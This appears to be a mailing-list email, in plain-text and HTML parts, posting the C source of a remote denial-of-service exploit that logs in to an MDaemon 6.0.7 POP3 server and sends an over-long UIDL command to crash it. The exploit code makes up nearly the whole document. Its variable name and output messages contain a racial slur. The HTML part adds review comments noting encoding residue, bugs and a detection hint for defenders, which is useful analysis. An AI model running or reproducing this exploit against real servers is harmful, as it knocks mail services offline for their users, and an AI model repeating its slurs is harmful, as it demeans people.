------=_NextPart_001_01B9_01C282B0.704350F0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, Description: MDaemon 6.0.7 Remote DoS Exploit. Overflows the UIDL bug. Exploit code tested to run on Redhat8 and FreeBSD 4.7-STABLE. Requires POP3 account on vulnerable daemon. Sends the overflow string and crashes MDaemon. http://www.division7.us support@division7.us Code included and attached d7-mdaemonx.c START CODE ---snip d7-mdaemonx.c---- /* * MDaemonX DoS Exploit * MDaemon is a popular Win32 based, SMTP, POP, IMAP Server * Crashes MDaemon 6.0.7 < With UIDL Overflow String * Coded by Division 7 Security Systems * http://www.division7.us * pHrail, smurf, elu1d=20 * support@division7.us=20 * Tested to work on Redhat8.0 and FreeBSD 4.7-STABLE=20 * TeKn|CaL j00 were own3d by this, do not DENY! */ #include #include #include #include #include #include #include #include #include #define MAXDATASIZE 100 // max number of bytes we can get at once=20 void usage(char *program){ printf("[<$>] MDaemon - DOS Attack - Ported for FreeBSD and Linux\n"); printf("[<$>] Coded by division7\n"); printf("[<$>] pHrail, smurfy, elu1d\n"); printf("[<$>] Usage: %s \n", = program); printf("[<$>] Note: port 110 is default if port is not specified\n"); } int main(int argc, char *argv[]) { int sockfd, numbytes, i, port, nigger;=20 char buf[MAXDATASIZE]; char user[256]; char pass[256];=20 char uidl[256]=3D"UIDL 11111111111111111111111111111111\n\0"; struct hostent *he; struct sockaddr_in their_addr; // connector's address information=20 if(argc < 4){ usage(argv[0]); exit(0); } if (argv[4] =3D=3D NULL) { port =3D 110; } else { port =3D atoi(argv[4]); } if ((he=3Dgethostbyname(argv[1])) =3D=3D NULL) { // get the host info=20 perror("gethostbyname"); exit(1); } if ((sockfd =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1) { perror("socket"); exit(1); } their_addr.sin_family =3D AF_INET; // host byte order=20 their_addr.sin_port =3D htons(port); // short, 
network byte order=20 their_addr.sin_addr =3D *((struct in_addr *)he->h_addr); memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct=20 if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct = sockaddr)) =3D=3D -1) { printf("Sorry, cannot connect to %s. Try again...\n", argv[1]); exit(1); } sprintf(user,"USER %s\n",argv[2]); sprintf(pass,"PASS %s\n",argv[3]);=20 nigger =3D strlen(pass) - 5;=20 printf("User: %s\n", argv[2]); printf("Pass: "); for(i =3D 1; i < nigger; i++) { printf("*"); } printf("\n");=20 printf("Host: %s\n", argv[1]); printf("Port: %lu\n", port); if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) { perror("recv"); exit(1); } buf[numbytes] =3D '\0';=20 printf("Received: %s",buf); write(sockfd, user, strlen(user)); if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) { perror("recv"); exit(1); } /*memset(buf,'\0',sizeof(buf));*/ buf[numbytes] =3D '\0'; printf("Received: %s",buf); sleep(1); write(sockfd, pass, strlen(pass)); if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) { perror("recv"); exit(1); } /*memset(buf,'\0',sizeof(buf));*/ buf[numbytes] =3D '\0'; printf("Received: %s",buf); sleep(1); printf("Logged In...Now blowing this bitch up...\n"); write(sockfd, uidl, strlen(uidl)); printf("Nigger attack complete...sleeping and exiting...\n");=20 sleep(5); close(sockfd); return 0; } ---EOF---- ------=_NextPart_001_01B9_01C282B0.704350F0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

            Hi,
            Description: MDaemon 6.0.7 Remote DoS Exploit. Triggers the UIDL overflow bug.
            Exploit code tested to run on Redhat8 and FreeBSD 4.7-STABLE.
            Requires a POP3 account on the vulnerable daemon. Sends the overflow string
            and crashes MDaemon. http://www.division7.us support@division7.us
             
            Code included and attached: d7-mdaemonx.c
             
            START CODE
             
            ---snip d7-mdaemonx.c----
             

            /*

            * MDaemonX DoS Exploit

            * MDaemon is a popular Win32 based, SMTP, POP, IMAP Server

            * Crashes MDaemon 6.0.7 < With UIDL Overflow String

            * Coded by Division 7 Security Systems

            * http://www.division7.us

            * pHrail, smurf, elu1d

            * support@division7.us

            * Tested to work on Redhat8.0 and FreeBSD 4.7-STABLE

            * TeKn|CaL j00 were own3d by this, do not DENY!

            */

            #include <stdio.h>

            #include <stdlib.h>

            #include <unistd.h>

            #include <errno.h>

            #include <string.h>

            #include <netdb.h>

            #include <sys/types.h>

            #include <netinet/in.h>

            #include <sys/socket.h>

             

             

             

            #define MAXDATASIZE 100 // size of main()'s receive buffer; each recv() reads at most MAXDATASIZE-1 bytes

             

            /*
             * Print the tool's banner and command-line synopsis to stdout.
             *
             * program: name shown in the "Usage:" line; main() passes argv[0].
             *
             * NOTE(review): the "=20" and "= " sequences inside the string
             * literals are quoted-printable residue from the mail transfer,
             * not part of the intended output; they are left as found.
             */
            void usage(char *program){

            printf("[<$>] MDaemon - DOS Attack - Ported for FreeBSD and=20 Linux\n");

            printf("[<$>] Coded by division7\n");

            printf("[<$>] pHrail, smurfy, elu1d\n");

            printf("[<$>] Usage: %s <host> <username> = <password>=20 <port>\n", program);

            printf("[<$>] Note: port 110 is default if port is not=20 specified\n");

            }

             

             

             

            /*
             * Entry point: log in to a POP3 server and send one fixed UIDL command.
             *
             * Arguments: argv[1] host, argv[2] username, argv[3] password,
             * optional argv[4] port (110 when absent). With fewer than three
             * arguments the usage text is printed and the process exits with
             * status 0. Exits with status 1 when name resolution, socket(),
             * connect() or recv() fails; otherwise returns 0 after closing the
             * socket.
             *
             * NOTE(review): the "=3D", "=20" and "= " sequences in this listing
             * are quoted-printable residue (the enclosing mail part is declared
             * quoted-printable; "=3D" encodes "="). The listing is reproduced
             * as found and does not compile in this form.
             *
             * Defender notes: the only traffic produced is an ordinary
             * USER/PASS login followed by a single UIDL line whose argument is
             * a long run of digits, so valid POP3 credentials are a
             * precondition. What a monitor or POP3 proxy can key on is an
             * authenticated session sending UIDL with an argument far longer
             * than any plausible message number. The page names MDaemon 6.0.7
             * as affected; the fixed release is not stated here.
             */
            int main(int argc, char *argv[])

            {

            int sockfd, numbytes, i, port, nigger;

            char buf[MAXDATASIZE];

            char user[256];

            char pass[256];

            /* Fixed command line sent after login: "UIDL", a digit-string argument, newline. */
            char uidl[256]=3D"UIDL 11111111111111111111111111111111\n\0";

            struct hostent *he;

            struct sockaddr_in their_addr; // connector's address information

            if(argc < 4){

            usage(argv[0]);

            exit(0);

            }



            /* argv[argc] is guaranteed to be NULL, so this test is safe when
               exactly three arguments are given. */
            if (argv[4] =3D=3D NULL) {

            port =3D 110;

            } else {

            /* atoi() reports no errors: a non-numeric port silently becomes 0. */
            port =3D atoi(argv[4]);

            }









            if ((he=3Dgethostbyname(argv[1])) =3D=3D NULL) { // get the host info

            perror("gethostbyname");

            exit(1);

            }

            if ((sockfd =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1) {

            perror("socket");

            exit(1);

            }

            their_addr.sin_family =3D AF_INET; // host byte order

            their_addr.sin_port =3D htons(port); // short, network byte order

            their_addr.sin_addr =3D *((struct in_addr *)he->h_addr);

            memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct

            if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct = sockaddr)) =3D=3D -1) {

            printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

            exit(1);

            }

            /* NOTE(review): unbounded sprintf() into 256-byte buffers; an
               over-long username or password argument overflows this program's
               own stack buffers. */
            sprintf(user,"USER %s\n",argv[2]);

            sprintf(pass,"PASS %s\n",argv[3]);

            /* strlen(pass) - 5 is the password length plus one; it only bounds
               the masking loop below. */
            nigger =3D strlen(pass) - 5;



            printf("User: %s\n", argv[2]);

            printf("Pass: ");

            /* Starting at 1, this prints one '*' per password character. */
            for(i =3D 1; i < nigger; i++)

            {

            printf("*");

            }

            printf("\n");

            printf("Host: %s\n", argv[1]);

            /* NOTE(review): port is an int but is printed with %lu, a
               mismatched format specifier (undefined behaviour). */
            printf("Port: %lu\n", port);

            /* Read the server greeting; at most MAXDATASIZE-1 bytes so the
               terminator written below fits. A return of 0 (peer closed) is
               not treated as an error. */
            if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {

            perror("recv");

            exit(1);

            }

            buf[numbytes] =3D '\0';

            printf("Received: %s",buf);

            /* Send USER; the return value of write() is not checked here or
               for the later writes. */
            write(sockfd, user, strlen(user));

            if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {

            perror("recv");

            exit(1);

            }

            /*memset(buf,'\0',sizeof(buf));*/

            buf[numbytes] =3D '\0';

            printf("Received: %s",buf);

            sleep(1);

            /* Send PASS. The reply is echoed but never parsed, so the
               "Logged In" message below is printed even if the server
               rejected the credentials. */
            write(sockfd, pass, strlen(pass));

            if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {

            perror("recv");

            exit(1);

            }

            /*memset(buf,'\0',sizeof(buf));*/

            buf[numbytes] =3D '\0';

            printf("Received: %s",buf);

            sleep(1);

            printf("Logged In...Now blowing this bitch up...\n");

            /* Send the fixed UIDL line. No reply is read afterwards, so the
               completion message is unconditional and the program does not
               confirm any effect on the server. */
            write(sockfd, uidl, strlen(uidl));

            printf("Nigger attack complete...sleeping and exiting...\n");

            sleep(5);

            close(sockfd);

            return 0;

            }

             

            ---EOF----


                      ------=_NextPart_001_01B9_01C282B0.704350F0--